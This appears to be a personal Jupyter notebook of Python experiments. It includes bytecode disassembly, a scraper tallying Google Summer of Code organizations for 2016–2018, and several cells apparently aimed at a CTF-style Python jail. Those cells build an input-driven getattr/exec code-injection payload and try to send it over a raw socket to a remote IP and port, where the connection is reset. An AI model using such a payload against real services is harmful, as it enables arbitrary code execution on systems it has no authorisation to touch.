{
 "cells": [
  {
   "cell_type": "code",
   "execution_count": 11,
   "metadata": {},
   "outputs": [],
   "source": [
    "import dis\n",
    "import sys"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 2,
   "metadata": {},
   "outputs": [],
   "source": [
    "def temp():\n",
    "    a=1\n",
    "def foo(f):\n",
    "    return f"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 14,
   "metadata": {},
   "outputs": [],
   "source": [
    "import numpy"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 21,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "exec\n"
     ]
    }
   ],
   "source": [
    "t = getattr(__builtin__,input())"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 31,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "builtin_function_or_method"
      ]
     },
     "execution_count": 31,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "type(t)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 36,
   "metadata": {},
   "outputs": [],
   "source": [
    "def foo():\n",
    "    print('foo')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 41,
   "metadata": {},
   "outputs": [],
   "source": [
    "v1 = 'var1'\n",
    "v2 = 'var2'\n",
    "v3 = 'var3'"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 43,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "var1__builtin__\n",
      "var2exec\n",
      "var3exit\n",
      "None\n"
     ]
    }
   ],
   "source": [
    "print(f'{getattr(globals()[input(v1)],input(v2))(input(v3))}')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 72,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "__builtin__\n",
      "exec\n",
      "import numpy as np; arr=np.array([1,2,3,4])\n",
      "None\n"
     ]
    }
   ],
   "source": [
    "print(f'{getattr(globals()[input()],input())(input())}')"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 73,
   "metadata": {},
   "outputs": [
    {
     "data": {
      "text/plain": [
       "array([1, 2, 3, 4])"
      ]
     },
     "execution_count": 73,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "arr"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 64,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "print(f'{getattr(globals()[input()],input())(input())}')\n"
     ]
    }
   ],
   "source": [
    "payload = b\"print(f'{getattr(globals()[input()],input())(input())}')\"\n",
    "print(payload.decode())"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 41,
   "metadata": {},
   "outputs": [],
   "source": [
    "import socket\n",
    "s = socket.socket()\n",
    "\n",
    "load = \"f'{getattr(globals()[input()],input())(input())}'\"\n",
    "\n",
    "s.connect((\"35.154.186.5\",8401))"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 42,
   "metadata": {},
   "outputs": [
    {
     "ename": "ConnectionResetError",
     "evalue": "[Errno 104] Connection reset by peer",
     "output_type": "error",
     "traceback": [
      "\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
      "\u001b[0;31mConnectionResetError\u001b[0m                      Traceback (most recent call last)",
      "\u001b[0;32m<ipython-input-42-b74192063775>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m()\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0ms\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0msend\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0mload\u001b[0m\u001b[0;34m.\u001b[0m\u001b[0mencode\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
      "\u001b[0;31mConnectionResetError\u001b[0m: [Errno 104] Connection reset by peer"
     ]
    }
   ],
   "source": [
    "s.send(load.encode())"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 53,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "\n",
      " 40           0 LOAD_FAST                0 (x)\n",
      "              2 LOAD_CONST               1 (None)\n",
      "              4 COMPARE_OP               8 (is)\n",
      "              6 POP_JUMP_IF_FALSE       22\n",
      "\n",
      " 41           8 LOAD_GLOBAL              0 (distb)\n",
      "             10 LOAD_FAST                1 (file)\n",
      "             12 LOAD_CONST               2 (('file',))\n",
      "             14 CALL_FUNCTION_KW         1\n",
      "             16 POP_TOP\n",
      "\n",
      " 42          18 LOAD_CONST               1 (None)\n",
      "             20 RETURN_VALUE\n",
      "\n",
      " 43     >>   22 LOAD_GLOBAL              1 (hasattr)\n",
      "             24 LOAD_FAST                0 (x)\n",
      "             26 LOAD_CONST               3 ('__func__')\n",
      "             28 CALL_FUNCTION            2\n",
      "             30 POP_JUMP_IF_FALSE       38\n",
      "\n",
      " 44          32 LOAD_FAST                0 (x)\n",
      "             34 LOAD_ATTR                2 (__func__)\n",
      "             36 STORE_FAST               0 (x)\n",
      "\n",
      " 45     >>   38 LOAD_GLOBAL              1 (hasattr)\n",
      "             40 LOAD_FAST                0 (x)\n",
      "             42 LOAD_CONST               4 ('__code__')\n",
      "             44 CALL_FUNCTION            2\n",
      "             46 POP_JUMP_IF_FALSE       54\n",
      "\n",
      " 46          48 LOAD_FAST                0 (x)\n",
      "             50 LOAD_ATTR                3 (__code__)\n",
      "             52 STORE_FAST               0 (x)\n",
      "\n",
      " 47     >>   54 LOAD_GLOBAL              1 (hasattr)\n",
      "             56 LOAD_FAST                0 (x)\n",
      "             58 LOAD_CONST               5 ('gi_code')\n",
      "             60 CALL_FUNCTION            2\n",
      "             62 POP_JUMP_IF_FALSE       70\n",
      "\n",
      " 48          64 LOAD_FAST                0 (x)\n",
      "             66 LOAD_ATTR                4 (gi_code)\n",
      "             68 STORE_FAST               0 (x)\n",
      "\n",
      " 49     >>   70 LOAD_GLOBAL              1 (hasattr)\n",
      "             72 LOAD_FAST                0 (x)\n",
      "             74 LOAD_CONST               6 ('__dict__')\n",
      "             76 CALL_FUNCTION            2\n",
      "             78 POP_JUMP_IF_FALSE      216\n",
      "\n",
      " 50          80 LOAD_GLOBAL              5 (sorted)\n",
      "             82 LOAD_FAST                0 (x)\n",
      "             84 LOAD_ATTR                6 (__dict__)\n",
      "             86 LOAD_ATTR                7 (items)\n",
      "             88 CALL_FUNCTION            0\n",
      "             90 CALL_FUNCTION            1\n",
      "             92 STORE_FAST               2 (items)\n",
      "\n",
      " 51          94 SETUP_LOOP             218 (to 314)\n",
      "             96 LOAD_FAST                2 (items)\n",
      "             98 GET_ITER\n",
      "        >>  100 FOR_ITER               110 (to 212)\n",
      "            102 UNPACK_SEQUENCE          2\n",
      "            104 STORE_FAST               3 (name)\n",
      "            106 STORE_FAST               4 (x1)\n",
      "\n",
      " 52         108 LOAD_GLOBAL              8 (isinstance)\n",
      "            110 LOAD_FAST                4 (x1)\n",
      "            112 LOAD_GLOBAL              9 (_have_code)\n",
      "            114 CALL_FUNCTION            2\n",
      "            116 POP_JUMP_IF_FALSE      100\n",
      "\n",
      " 53         118 LOAD_GLOBAL             10 (print)\n",
      "            120 LOAD_CONST               7 ('Disassembly of %s:')\n",
      "            122 LOAD_FAST                3 (name)\n",
      "            124 BINARY_MODULO\n",
      "            126 LOAD_FAST                1 (file)\n",
      "            128 LOAD_CONST               2 (('file',))\n",
      "            130 CALL_FUNCTION_KW         2\n",
      "            132 POP_TOP\n",
      "\n",
      " 54         134 SETUP_EXCEPT            16 (to 152)\n",
      "\n",
      " 55         136 LOAD_GLOBAL             11 (dis)\n",
      "            138 LOAD_FAST                4 (x1)\n",
      "            140 LOAD_FAST                1 (file)\n",
      "            142 LOAD_CONST               2 (('file',))\n",
      "            144 CALL_FUNCTION_KW         2\n",
      "            146 POP_TOP\n",
      "            148 POP_BLOCK\n",
      "            150 JUMP_FORWARD            48 (to 200)\n",
      "\n",
      " 56     >>  152 DUP_TOP\n",
      "            154 LOAD_GLOBAL             12 (TypeError)\n",
      "            156 COMPARE_OP              10 (exception match)\n",
      "            158 POP_JUMP_IF_FALSE      198\n",
      "            160 POP_TOP\n",
      "            162 STORE_FAST               5 (msg)\n",
      "            164 POP_TOP\n",
      "            166 SETUP_FINALLY           20 (to 188)\n",
      "\n",
      " 57         168 LOAD_GLOBAL             10 (print)\n",
      "            170 LOAD_CONST               8 ('Sorry:')\n",
      "            172 LOAD_FAST                5 (msg)\n",
      "            174 LOAD_FAST                1 (file)\n",
      "            176 LOAD_CONST               2 (('file',))\n",
      "            178 CALL_FUNCTION_KW         3\n",
      "            180 POP_TOP\n",
      "            182 POP_BLOCK\n",
      "            184 POP_EXCEPT\n",
      "            186 LOAD_CONST               1 (None)\n",
      "        >>  188 LOAD_CONST               1 (None)\n",
      "            190 STORE_FAST               5 (msg)\n",
      "            192 DELETE_FAST              5 (msg)\n",
      "            194 END_FINALLY\n",
      "            196 JUMP_FORWARD             2 (to 200)\n",
      "        >>  198 END_FINALLY\n",
      "\n",
      " 58     >>  200 LOAD_GLOBAL             10 (print)\n",
      "            202 LOAD_FAST                1 (file)\n",
      "            204 LOAD_CONST               2 (('file',))\n",
      "            206 CALL_FUNCTION_KW         1\n",
      "            208 POP_TOP\n",
      "            210 JUMP_ABSOLUTE          100\n",
      "        >>  212 POP_BLOCK\n",
      "            214 JUMP_FORWARD            98 (to 314)\n",
      "\n",
      " 59     >>  216 LOAD_GLOBAL              1 (hasattr)\n",
      "            218 LOAD_FAST                0 (x)\n",
      "            220 LOAD_CONST               9 ('co_code')\n",
      "            222 CALL_FUNCTION            2\n",
      "            224 POP_JUMP_IF_FALSE      240\n",
      "\n",
      " 60         226 LOAD_GLOBAL             13 (disassemble)\n",
      "            228 LOAD_FAST                0 (x)\n",
      "            230 LOAD_FAST                1 (file)\n",
      "            232 LOAD_CONST               2 (('file',))\n",
      "            234 CALL_FUNCTION_KW         2\n",
      "            236 POP_TOP\n",
      "            238 JUMP_FORWARD            74 (to 314)\n",
      "\n",
      " 61     >>  240 LOAD_GLOBAL              8 (isinstance)\n",
      "            242 LOAD_FAST                0 (x)\n",
      "            244 LOAD_GLOBAL             14 (bytes)\n",
      "            246 LOAD_GLOBAL             15 (bytearray)\n",
      "            248 BUILD_TUPLE              2\n",
      "            250 CALL_FUNCTION            2\n",
      "            252 EXTENDED_ARG             1\n",
      "            254 POP_JUMP_IF_FALSE      270\n",
      "\n",
      " 62         256 LOAD_GLOBAL             16 (_disassemble_bytes)\n",
      "            258 LOAD_FAST                0 (x)\n",
      "            260 LOAD_FAST                1 (file)\n",
      "            262 LOAD_CONST               2 (('file',))\n",
      "            264 CALL_FUNCTION_KW         2\n",
      "            266 POP_TOP\n",
      "            268 JUMP_FORWARD            44 (to 314)\n",
      "\n",
      " 63     >>  270 LOAD_GLOBAL              8 (isinstance)\n",
      "            272 LOAD_FAST                0 (x)\n",
      "            274 LOAD_GLOBAL             17 (str)\n",
      "            276 CALL_FUNCTION            2\n",
      "            278 EXTENDED_ARG             1\n",
      "            280 POP_JUMP_IF_FALSE      296\n",
      "\n",
      " 64         282 LOAD_GLOBAL             18 (_disassemble_str)\n",
      "            284 LOAD_FAST                0 (x)\n",
      "            286 LOAD_FAST                1 (file)\n",
      "            288 LOAD_CONST               2 (('file',))\n",
      "            290 CALL_FUNCTION_KW         2\n",
      "            292 POP_TOP\n",
      "            294 JUMP_FORWARD            18 (to 314)\n",
      "\n",
      " 66     >>  296 LOAD_GLOBAL             12 (TypeError)\n",
      "            298 LOAD_CONST              10 (\"don't know how to disassemble %s objects\")\n",
      "\n",
      " 67         300 LOAD_GLOBAL             19 (type)\n",
      "            302 LOAD_FAST                0 (x)\n",
      "            304 CALL_FUNCTION            1\n",
      "            306 LOAD_ATTR               20 (__name__)\n",
      "            308 BINARY_MODULO\n",
      "            310 CALL_FUNCTION            1\n",
      "    -->     312 RAISE_VARARGS            1\n",
      "        >>  314 LOAD_CONST               1 (None)\n",
      "            316 RETURN_VALUE\n"
     ]
    }
   ],
   "source": [
    "import dis\n",
    "dis.dis(print())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# GGGGGGGGSSSSSSSSSSSSSSSOOOOOOOOOOOOOOOOOOOOO"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 44,
   "metadata": {},
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "('OpenAstronomy', 3)\n",
      "('Homebrew', 3)\n",
      "('Sage Mathematical Software System', 3)\n",
      "('MuseScore', 3)\n",
      "('GNU Radio', 3)\n",
      "('R project for statistical computing', 3)\n",
      "('Oppia Foundation', 3)\n",
      "('Inkscape', 3)\n",
      "('Mobile Robot Programming Toolkit (MRPT)', 3)\n",
      "('Genes, Genomes and Variation', 3)\n",
      "('Scala', 3)\n",
      "('MovingBlocks', 3)\n",
      "('CloudCV', 3)\n",
      "('strace', 3)\n",
      "('Performance Co-Pilot', 3)\n",
      "('BRL-CAD', 3)\n",
      "('FOSSASIA', 3)\n",
      "('Wikimedia Foundation', 3)\n",
      "('Blender Foundation', 3)\n",
      "('Matrix.org', 3)\n",
      "('NumFOCUS', 3)\n",
      "('The Linux Foundation', 3)\n",
      "('SymPy', 3)\n",
      "('Mixxx DJ Software', 3)\n",
      "('Django Software Foundation', 3)\n",
      "('Mozilla', 3)\n",
      "('CCExtractor Development', 3)\n",
      "('GNU Octave', 3)\n",
      "('LabLua', 3)\n",
      "('Python Software Foundation', 3)\n",
      "('OpenMRS', 3)\n",
      "('FreeBSD', 3)\n",
      "('Free and Open Source Silicon Foundation', 3)\n",
      "('The Honeynet Project', 3)\n",
      "('openSUSE', 3)\n",
      "('Sugar Labs', 3)\n",
      "('Ruby Science Foundation', 3)\n",
      "('JBoss Community', 3)\n",
      "('ScummVM', 3)\n",
      "('XWiki', 3)\n",
      "('LibreOffice', 3)\n",
      "('Git', 3)\n",
      "('Apache Software Foundation', 3)\n",
      "('Open Chemistry', 3)\n",
      "('Xapian Search Engine Library', 3)\n",
      "('The NetBSD Foundation', 3)\n",
      "('Red Hen Lab', 3)\n",
      "('Boston University / XIA', 3)\n",
      "('FFmpeg', 3)\n",
      "('Drupal', 3)\n",
      "('Fedora Project', 3)\n",
      "('Gentoo Foundation', 3)\n",
      "('National Resource for Network Biology (NRNB)', 3)\n",
      "('Netfilter project', 3)\n",
      "('RTEMS Project', 3)\n",
      "('Public Lab', 3)\n",
      "('ReactOS', 3)\n",
      "('Open Bioinformatics Foundation', 3)\n",
      "('Beam Community', 3)\n",
      "('QEMU', 3)\n",
      "('P2PSP.org', 3)\n",
      "('Catrobat', 3)\n",
      "('Computational Biology @ University of Nebraska-Lincoln', 3)\n",
      "('Classical Language Toolkit', 3)\n",
      "('GNOME', 3)\n",
      "('TEAMMATES @ National University of Singapore', 3)\n",
      "('OpenStreetMap', 3)\n",
      "('The Center for Connected Learning and Computer-Based Modeling', 3)\n",
      "('aimacode', 3)\n",
      "('Moodle', 3)\n",
      "('The Wine Project', 3)\n",
      "('Portland State University', 2)\n",
      "('Debian Project', 2)\n",
      "('Ceph', 2)\n",
      "('WSO2', 2)\n",
      "('ownCloud', 2)\n",
      "('X.Org Foundation', 2)\n",
      "('Open Detection', 2)\n",
      "('KDE', 2)\n",
      "('vitrivr', 2)\n",
      "('52°North Initiative for Geospatial Open Source Software GmbH', 2)\n",
      "('Copyleft Games', 2)\n",
      "('Urban Energy Systems Laboratory, Empa', 2)\n",
      "('OpenCV', 2)\n",
      "('GNU Project', 2)\n",
      "('Sigmah', 2)\n",
      "('TimVideos.us', 2)\n",
      "('Shogun Machine Learning Toolbox', 2)\n",
      "('Chapel', 2)\n",
      "('Mifos Initiative', 2)\n",
      "('The Julia Language', 2)\n",
      "('Open Genome Informatics', 2)\n",
      "('Discourse', 2)\n",
      "('Liquid Galaxy Project', 2)\n",
      "('Sustainable Computing Research Group ( SCoRe )', 2)\n",
      "('gRPC', 2)\n",
      "('JSK Robotics Laboratory', 2)\n",
      "('Open Source Robotics Foundation', 2)\n",
      "('MariaDB', 2)\n",
      "('Physical Web Project', 2)\n",
      "('Nmap Security Scanner', 2)\n",
      "('Joomla!', 2)\n",
      "('Inclusive Design Institute', 2)\n",
      "('Plone Foundation', 2)\n",
      "('radare', 2)\n",
      "('lowRISC', 2)\n",
      "('OWASP Foundation', 2)\n",
      "('Freifunk', 2)\n",
      "('cBioPortal for Cancer Genomics', 2)\n",
      "('Ruby', 2)\n",
      "('Green Navigation', 2)\n",
      "('Stony Brook University Biomedical Informatics', 2)\n",
      "('Rocket.Chat', 2)\n",
      "('Ruby on Rails', 2)\n",
      "('appleseedhq', 2)\n",
      "('The ns-3 Network Simulator Project', 2)\n",
      "('Conversations.im', 2)\n",
      "('Checker Framework', 2)\n",
      "('MetaBrainz Foundation Inc.', 2)\n",
      "('STE||AR Group', 2)\n",
      "('INCF', 2)\n",
      "('BeeWare Project', 2)\n",
      "('Institute for Artificial Intelligence', 2)\n",
      "('PEcAn Project', 2)\n",
      "('coala', 2)\n",
      "('ViSP', 2)\n",
      "('The Processing Foundation', 2)\n",
      "('LLVM Compiler Infrastructure', 2)\n",
      "('phpBB Forum Software', 2)\n",
      "('The MacPorts Project', 2)\n",
      "('phpMyAdmin', 2)\n",
      "('Internet Archive', 2)\n",
      "('RoboComp', 2)\n",
      "('UCSC Xena', 2)\n",
      "('LuaRocks', 2)\n",
      "('OSGeo', 2)\n",
      "('DBpedia', 2)\n",
      "('LibreHealth', 2)\n",
      "('Metasploit', 2)\n",
      "('Zulip', 2)\n",
      "('Amahi', 2)\n",
      "('CLiPS, University of Antwerp', 2)\n",
      "('PostgreSQL', 2)\n",
      "('VideoLAN', 2)\n",
      "('Open States', 2)\n",
      "('Apertium', 2)\n",
      "('Jitsi', 2)\n",
      "('The Java Pathfinder Team', 2)\n",
      "('Apertus Association', 2)\n",
      "('Polly Labs', 2)\n",
      "('The Eclipse Foundation', 2)\n",
      "('Haiku', 2)\n",
      "('mlpack', 2)\n",
      "('The Libreswan Project', 2)\n",
      "('Rspamd', 2)\n",
      "('BeagleBoard.org Foundation', 2)\n",
      "('Cloud Native Computing Foundation (CNCF)', 2)\n",
      "('Open Data Kit', 2)\n",
      "('OpenWISP', 2)\n",
      "('ArduPilot', 2)\n",
      "('PMD', 2)\n",
      "('Boost C++ Libraries', 2)\n",
      "('AerospaceResearch.net', 2)\n",
      "('libvirt', 2)\n",
      "('XBMC Foundation', 2)\n",
      "('GNSS-SDR', 2)\n",
      "('CERN-HSF', 2)\n",
      "('Scilab', 2)\n",
      "('JdeRobot - Universidad Rey Juan Carlos', 2)\n",
      "('AOSSIE - Australian Open Source Software Innovation and Education', 2)\n",
      "('Global Alliance for Genomics and Health', 2)\n",
      "('Timelab Technologies Ltd.', 1)\n",
      "('The Apertium Project', 1)\n",
      "('International Neuroinformatics Coordinating Facility', 1)\n",
      "('The syslog-ng project', 1)\n",
      "('CERN SFT', 1)\n",
      "('Global Alliance for Genomics & Health', 1)\n",
      "('Biomedical Informatics, Emory University', 1)\n",
      "('The Tor Project', 1)\n",
      "('Computational Science and Engineering at TU Wien', 1)\n",
      "('CiviCRM', 1)\n",
      "('BeagleBoard.org', 1)\n",
      "('KolibriOS', 1)\n",
      "('MIT Media Lab', 1)\n",
      "('D Foundation', 1)\n",
      "('Soletta Project', 1)\n",
      "('GNU Mailman', 1)\n",
      "('Unitex/GramLab', 1)\n",
      "('GPAC', 1)\n",
      "('Java Pathfinder Team', 1)\n",
      "('Berkman Center for Internet and Society', 1)\n",
      "(\"AOSSIE - The Australian National University's Open-Source Software Innovation and Education\", 1)\n",
      "('Celluloid', 1)\n",
      "('coreboot', 1)\n",
      "('ModSecurity', 1)\n",
      "('Canadian Centre for Computational Genomics (C3G) - Montreal node', 1)\n",
      "('Robocomp', 1)\n",
      "('GitHub', 1)\n",
      "('TARDIS-SN', 1)\n",
      "('BioJS', 1)\n",
      "('Scilab Enterprises', 1)\n",
      "('OSU Open Source Lab', 1)\n",
      "('PRISM Model Checker', 1)\n",
      "('The STE||AR Group', 1)\n",
      "('PLASMA-UMass', 1)\n",
      "('jQuery Foundation', 1)\n",
      "('gnss-sdr', 1)\n",
      "('dbpediaspotlight', 1)\n",
      "('Health Information Systems Programme', 1)\n",
      "('OpenKeychain (OpenPGP for Android)', 1)\n",
      "('Indic Project', 1)\n",
      "('MBDyn, Department of Aerospace Science and Technology at Politecnico di Milano', 1)\n",
      "('Gambit - Software Tools for Game Theory', 1)\n",
      "('The LLVM Compiler Infrastructure', 1)\n",
      "('FOSDEM VZW', 1)\n",
      "('The Monarch Initiative', 1)\n",
      "('ArchC', 1)\n",
      "('OSGeo - The Open Source Geospatial Foundation', 1)\n",
      "('Zulip Open Source Project', 1)\n",
      "('Wayland', 1)\n",
      "('CVXPY', 1)\n",
      "('Distributed and Unified Numerics Environment (DUNE)', 1)\n",
      "('ASCEND', 1)\n",
      "('Orange – Data Mining Fruitful & Fun', 1)\n",
      "('VideoLAN / VLMC Project', 1)\n",
      "('mlpack: a scalable C++ machine learning library', 1)\n",
      "('Systers, an Anita Borg Institute Community', 1)\n",
      "('Eclipse Foundation', 1)\n",
      "('MetaBrainz Foundation', 1)\n",
      "('Libvirt', 1)\n",
      "('Ganeti', 1)\n",
      "('Open Ephys', 1)\n",
      "('Jenkins Project', 1)\n",
      "('Peragro', 1)\n",
      "('BuildmLearn', 1)\n",
      "('McGill Space Institute', 1)\n",
      "('Vert.x', 1)\n",
      "('Stony Brook University, Biomedical Informatics', 1)\n",
      "('Environmental Data And Governance Initiative', 1)\n",
      "('Eclipse Vert.x', 1)\n",
      "('Mono Project', 1)\n",
      "('Microkernel devroom', 1)\n",
      "('CMU Sphinx', 1)\n",
      "('Berkman Klein Center for Internet and Society at Harvard University', 1)\n",
      "('Samba', 1)\n",
      "('Zenodo', 1)\n",
      "('FOSDEM', 1)\n",
      "('Bazel', 1)\n",
      "('wxWidgets', 1)\n",
      "('Tor', 1)\n",
      "('GENIVI Development Platform', 1)\n",
      "('Checkstyle', 1)\n",
      "('Joomla', 1)\n",
      "('Open Technologies Alliance - GFOSS', 1)\n",
      "('The FreeType Project', 1)\n",
      "('MBDyn', 1)\n",
      "('illumos.org', 1)\n",
      "('Systers, an Anita Borg Institute community', 1)\n",
      "('Pharo Consortium', 1)\n",
      "('TimVideos', 1)\n",
      "('WorldBrain - Verifying the Internet with Science', 1)\n",
      "('oVirt', 1)\n",
      "('K-9 Mail', 1)\n",
      "('Qubes OS', 1)\n",
      "('Cadasta', 1)\n",
      "('Frescobaldi', 1)\n",
      "('Clojure', 1)\n",
      "('radare2', 1)\n",
      "('MIT App Inventor', 1)\n",
      "('The GNU Project', 1)\n",
      "('Babel', 1)\n",
      "('XMPP Standards Foundation', 1)\n",
      "('Intel Media and Audio for Linux', 1)\n",
      "('Tiled', 1)\n",
      "('AboutCode', 1)\n",
      "('Software Product Data Exchange (SPDX)', 1)\n",
      "('Elm Software Foundation', 1)\n",
      "('The CGAL Project', 1)\n",
      "('Xen Project', 1)\n",
      "('GFOSS - Open Technologies Alliance', 1)\n",
      "('FreeType', 1)\n",
      "('Cuneiform Digital Library Initiative', 1)\n",
      "('Software and Computational Systems Lab at LMU Munich', 1)\n",
      "('CGAL Project', 1)\n",
      "('OW2', 1)\n",
      "('CHAOSS: Community Health Analytics Open Source Software', 1)\n",
      "('Streetmix', 1)\n",
      "('Elastic', 1)\n",
      "('Intel Media And Audio For Linux', 1)\n",
      "('WorldBrain.io - Verifying the Internet', 1)\n",
      "('languagetool.org', 1)\n",
      "('Probot', 1)\n",
      "('Free UK Genealogy', 1)\n",
      "('Purr Data', 1)\n",
      "('Space @ Virginia Tech', 1)\n",
      "('Submitty', 1)\n",
      "('X.org Foundation', 1)\n",
      "('Haskell.org', 1)\n",
      "('Open Roberta Lab', 1)\n",
      "('CiviCRM LLC', 1)\n",
      "('Systers Community', 1)\n",
      "('Open Food Facts', 1)\n",
      "('The Qt Project', 1)\n",
      "('GENIVI Alliance', 1)\n",
      "('The Vega Visualization Tools by the UW Interactive Data Lab', 1)\n",
      "('OpenCensus', 1)\n",
      "('Plone', 1)\n",
      "('InterMine', 1)\n",
      "('Kiwix', 1)\n",
      "('Stemformatics', 1)\n",
      "('FOSSology', 1)\n",
      "('Pocket Science Lab', 1)\n",
      "('Earth Science Information Partners (ESIP)', 1)\n",
      "('Eta', 1)\n",
      "('Read the Docs', 1)\n",
      "('freifunk', 1)\n",
      "('Center for Research In Open Source Software (CROSS) at UC Santa Cruz', 1)\n",
      "('TLA+', 1)\n",
      "('KDE Community', 1)\n",
      "('omegaUp.com', 1)\n",
      "('Internet Systems Consortium', 1)\n",
      "('GNU Compiler Collection (GCC)', 1)\n",
      "('Digital Impact Alliance', 1)\n",
      "('Canadian Centre for Computational Genomics', 1)\n",
      "('JGraphT', 1)\n",
      "('MariaDB Foundation', 1)\n",
      "('xpra.org', 1)\n",
      "('webpack', 1)\n",
      "('JSK Robotics Laboratory / The University of Tokyo', 1)\n",
      "('Sustainable Computing Research Group (SCoRe)', 1)\n",
      "('Python HYDRA', 1)\n",
      "('Swift', 1)\n",
      "('Xi Editor Project', 1)\n",
      "('52° North Initiative for Geospatial Open Source Software GmbH', 1)\n",
      "('Jenkins project', 1)\n",
      "('Quill.org', 1)\n",
      "('LEAP Encryption Access Project', 1)\n",
      "('The syslog-ng project.', 1)\n",
      "('Godot Engine', 1)\n",
      "('OpenSIPS', 1)\n",
      "('The Mifos Initiative', 1)\n",
      "('OpnTec', 1)\n",
      "('Inria Foundation', 1)\n",
      "('Seastar', 1)\n",
      "('Developers Italia', 1)\n",
      "('Neovim', 1)\n",
      "('3DTK', 1)\n",
      "('Berkman Klein Center for Internet & Society at Harvard University', 1)\n",
      "('SPDX', 1)\n"
     ]
    }
   ],
   "source": [
    "import requests\n",
    "from bs4 import BeautifulSoup as bsp\n",
    "def foo(link):\n",
    "    res = requests.get(link)\n",
    "    ele = bsp(res.content,'html.parser')\n",
    "    return [x.text for x in ele.findAll('h4',\\\n",
    "            attrs={'class':'organization-card__name font-black-54'})]\n",
    "\n",
    "s16 = set(foo(\"https://summerofcode.withgoogle.com/archive/2016/organizations/\"))\n",
    "s17 = set(foo(\"https://summerofcode.withgoogle.com/archive/2017/organizations/\"))\n",
    "s18 = set(foo(\"https://summerofcode.withgoogle.com/archive/2018/organizations/\"))\n",
    "al = {}\n",
    "for s in s16:\n",
    "    if s not in al.keys():\n",
    "        al[s] = 1\n",
    "    else:\n",
    "        al[s] += 1\n",
    "for s in s17:\n",
    "    if s not in al.keys():\n",
    "        al[s] = 1\n",
    "    else:\n",
    "        al[s] += 1\n",
    "for s in s18:\n",
    "    if s not in al.keys():\n",
    "        al[s] = 1\n",
    "    else:\n",
    "        al[s] += 1\n",
    "final_list = s16.intersection(s17.intersection(s18))\n",
    "\n",
    "# print(final_list)\n",
    "srt = sorted([(k,v) for k,v in al.items()],key=lambda x:x[1],reverse=True)\n",
    "for sss in srt:\n",
    "    print(sss)\n"
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": "Python 3",
   "language": "python",
   "name": "python3"
  },
  "language_info": {
   "codemirror_mode": {
    "name": "ipython",
    "version": 3
   },
   "file_extension": ".py",
   "mimetype": "text/x-python",
   "name": "python",
   "nbconvert_exporter": "python",
   "pygments_lexer": "ipython3",
   "version": "3.6.7"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 2
}
